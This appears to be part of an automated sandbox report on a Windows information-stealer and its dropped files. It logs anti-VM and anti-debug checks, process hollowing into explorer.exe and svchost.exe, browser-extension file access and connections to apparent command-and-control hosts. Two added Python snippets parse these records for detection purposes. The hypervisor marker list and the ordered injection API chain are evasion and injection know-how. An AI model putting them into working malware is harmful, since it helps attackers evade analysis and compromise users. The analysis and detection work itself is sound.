Source: C:\Users\user\AppData\Local\Temp\1E7F.exe; API coverage: 8.1 %
Source: C:\Users\user\AppData\Local\Temp\309C.exe; API coverage: 6.0 %
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Evaded block: after key decision
Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\zmbGUZTICp.exe; API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; API call chain: ExitProcess graph end node (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.400678824.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWrf%SystemRoot%\system32\mswsock.dllRIs></cfg:Configuration></Signature>
Source: explorer.exe, 00000002.00000000.380915081.00000000062E0000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000001E.00000002.650238715.000002324785D000.00000004.00000001.sdmp; Binary or memory string: @Hyper-V RAW
Source: WerFault.exe, 0000000C.00000002.499940204.0000000004F9F000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.495220795.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.500036054.0000000004FF0000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.649941211.000002324784C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp, A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.400150959.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: svchost.exe, 0000001E.00000002.643084877.0000023242029000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW@Q
Source: explorer.exe, 00000002.00000000.400150959.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.400678824.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
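The registry walk of HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI recorded earlier in this section and the VMware and Hyper-V strings found in memory here are the same check seen from two sides: the sample enumerates the SCSI device tree and compares the vendor and product fields of each device ID against hypervisor markers. The following Python is an added example, not part of the report, that parses both forms present in the findings (PnP device instance IDs such as `SCSI\Disk&Ven_VMware&Prod_Virtual_disk\...` and device interface paths such as `\\?\scsi#cdrom&ven_necvmwar&...#{guid}`) and classifies them the way such a check does. The marker table is my assumption of commonly used vendor strings; a list like it is precisely what an analysis VM should patch out of its virtual disk and optical drive identities.

```python
import re

# Vendor/product substrings commonly used as hypervisor markers (assumed list,
# not taken from the sample; first match wins).
HYPERVISOR_MARKERS = {
    "vmware": "VMware", "necvmwar": "VMware", "vbox": "VirtualBox",
    "qemu": "QEMU", "virtio": "QEMU/KVM", "msft virtual": "Hyper-V",
    "virtual disk": "generic virtual disk", "xen": "Xen",
}

# Constructed from the strings the report found in explorer.exe memory, plus
# one physical-disk ID for contrast.
SAMPLE_IDS = [
    r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000",
    r"\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}",
    r"SCSI\Disk&Ven_SAMSUNG&Prod_MZVLB512HAJQ-000\4&2a1b3c4d&0&000000",
]


def parse_pnp_id(device_id):
    """Split a PnP instance ID (backslash-separated) or a device interface path
    (\\?\ prefix, '#'-separated, interface GUID suffix) into its fields."""
    s = device_id
    if s.startswith("\\\\?\\"):
        s = re.sub(r"#\{[0-9a-f-]{36}\}$", "", s[4:], flags=re.I)
        parts = s.split("#")
    else:
        parts = s.split("\\")
    if len(parts) < 2:
        return None
    fields = {"enumerator": parts[0].upper(), "class": None, "vendor": None,
              "product": None, "revision": None,
              "instance": parts[2] if len(parts) > 2 else None}
    for tok in parts[1].split("&"):          # e.g. Disk&Ven_VMware&Prod_Virtual_disk
        low = tok.lower()
        if low.startswith("ven_"):
            fields["vendor"] = tok[4:].replace("_", " ")
        elif low.startswith("prod_"):
            fields["product"] = tok[5:].replace("_", " ")
        elif low.startswith("rev_"):
            fields["revision"] = tok[4:]
        elif fields["class"] is None:
            fields["class"] = tok
    return fields


def detect_hypervisor(device_id):
    """Return the hypervisor a marker-based check would conclude from one ID, or None."""
    f = parse_pnp_id(device_id)
    if f is None:
        return None
    hay = " ".join(x for x in (f["vendor"], f["product"]) if x).lower()
    for marker, name in HYPERVISOR_MARKERS.items():
        if marker in hay:
            return name
    return None


def scan_device_ids(device_ids):
    """Map every ID to its verdict; a single hit is enough for the malware to bail."""
    return {d: detect_hypervisor(d) for d in device_ids}
```

On a live Windows host the input would come from enumerating the subkeys of the Enum\SCSI key (or from SetupDi device interface enumeration, which yields the `\\?\scsi#...` form); the function is deliberately substring-based because that is how the checks in commodity stealers work, which is also why renaming the virtual CD-ROM and disk models in the hypervisor configuration defeats them.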
Source: C:\Users\user\Desktop\zmbGUZTICp.exe; Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Code function: 11_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
Source: C:\Users\user\Desktop\zmbGUZTICp.exe; Code function: 0_2_004197F1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj System information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00435670 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00640042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Code function: 5_2_0073595D push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe Code function: 7_2_00470083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe Code function: 7_2_0208092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe Code function: 7_2_02080D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_00931893 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Process queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Process queried: DebugPort
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00422A40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_0042CA22 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00419A3A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 1_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Memory protected: page guard
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_0043A950 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00422A40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_0042BB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_004283D0 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe Code function: 7_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 40.93.207.0 25
                          Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exe Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exe Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exe Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe Domain query: goo.su
                          Source: C:\Windows\explorer.exe Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe Domain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
                          Benign Windows process drops PE files
                          Source: C:\Windows\explorer.exe File created: A7F0.exe.2.dr
                          Maps a DLL or memory area into another process
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processes
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4D0000 protect: page execute and read and write
                          Injects a PE file into a foreign process
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Memory written: C:\Users\user\Desktop\zmbGUZTICp.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Memory written: C:\Users\user\AppData\Local\Temp\3F71.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000 value starts with: 4D5A
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Thread created: C:\Windows\explorer.exe EIP: 4151930
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Thread created: unknown EIP: 48F1930
                          Writes to foreign memory regions
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 333008
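The `Code function: 0_2_00640110` record above is the textbook RunPE / process-hollowing sequence (create a child, read its thread context, unmap its image, allocate and write the payload, redirect the context, resume), and the `Memory written ... value starts with: 4D5A` records are the MZ header of a payload landing in another process. The Python below is an added example, not part of the report, that scores records of this shape: it matches the hollowing stages in order within one function's call list (the report's list is a static reference list, not a runtime trace, so the order is the order in the function body) and flags PE-header writes, distinguishing a write into a process with the same image (the sample's own suspended child, as with zmbGUZTICp.exe and 3F71.exe) from a write into a foreign image such as svchost.exe. The sample records are constructed from the lines above; the regexes assume the `Source: <path> <record>` layout used on this page.

```python
"""Added example (not from the sandbox report): match the process-hollowing API
chain and PE-header writes in records shaped like the ones on this page."""
import re

# Constructed records, copied in shape from the report lines above; the last one is a
# benign directory-walk function and must not match.
SAMPLE_RECORDS = [
    "Source: C:\\Users\\user\\Desktop\\zmbGUZTICp.exe Code function: 0_2_00640110 "
    "VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,"
    "ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,"
    "WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,",
    "Source: C:\\Windows\\SysWOW64\\ozuqupbe\\tejjnepq.exe Memory written: "
    "C:\\Windows\\SysWOW64\\svchost.exe base: 4D0000 value starts with: 4D5A",
    "Source: C:\\Users\\user\\Desktop\\zmbGUZTICp.exe Memory written: "
    "C:\\Users\\user\\Desktop\\zmbGUZTICp.exe base: 400000 value starts with: 4D5A",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\2DB3.exe Code function: 8_2_004096E0 "
    "wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,FindNextFileA,FindClose,",
]

# RunPE / process hollowing stages. Each stage lists interchangeable Win32 and native
# APIs; the stages must occur in this order within one function's call list.
HOLLOWING_STAGES = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread", "ZwResumeThread"},
]

# Tolerate both "…exe Code function:" and "…exe Code function:" (with or without the space).
CODE_FUNCTION_RE = re.compile(r"^Source: (?P<src>.+?)\s*Code function: (?P<fid>\S+) (?P<calls>.*)$")
MEMORY_WRITTEN_RE = re.compile(
    r"^Source: (?P<src>.+?)\s*Memory written: (?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) "
    r"value starts with: (?P<magic>[0-9A-Fa-f]+)$")


def parse_calls(calls_field):
    """'A,B,C,' -> ['A', 'B', 'C']"""
    return [c for c in calls_field.split(",") if c]


def matches_ordered_stages(calls, stages):
    """Greedy in-order match: each stage must be satisfied by a call that comes after the
    call that satisfied the previous stage; unrelated calls in between are ignored."""
    pos = 0
    for stage in stages:
        while pos < len(calls) and calls[pos] not in stage:
            pos += 1
        if pos == len(calls):
            return False
        pos += 1
    return True


def analyze(records):
    """Return (finding, source, detail) tuples for the records that match."""
    findings = []
    for line in records:
        m = CODE_FUNCTION_RE.match(line)
        if m:
            if matches_ordered_stages(parse_calls(m["calls"]), HOLLOWING_STAGES):
                findings.append(("process_hollowing_api_chain", m["src"], m["fid"]))
            continue
        m = MEMORY_WRITTEN_RE.match(line)
        if m and m["magic"].upper().startswith("4D5A"):   # 'MZ': a PE image is being written
            scope = "same_image" if m["src"].lower() == m["target"].lower() else "foreign_image"
            findings.append((f"pe_header_written_{scope}", m["src"], f"{m['target']}+0x{m['base']}"))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_RECORDS):
        print(*finding, sep=" | ")
```

The ordered-stage match matters: a function that merely imports ResumeThread and WriteProcessMemory for a legitimate loader does not satisfy the sequence, while the sample's function does even with VirtualFree, ReadProcessMemory and a second NtWriteVirtualMemory interleaved.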
                          .NET source code references suspicious native API functions
                          Source: 3F71.exe.2.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.2.3F71.exe.130000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
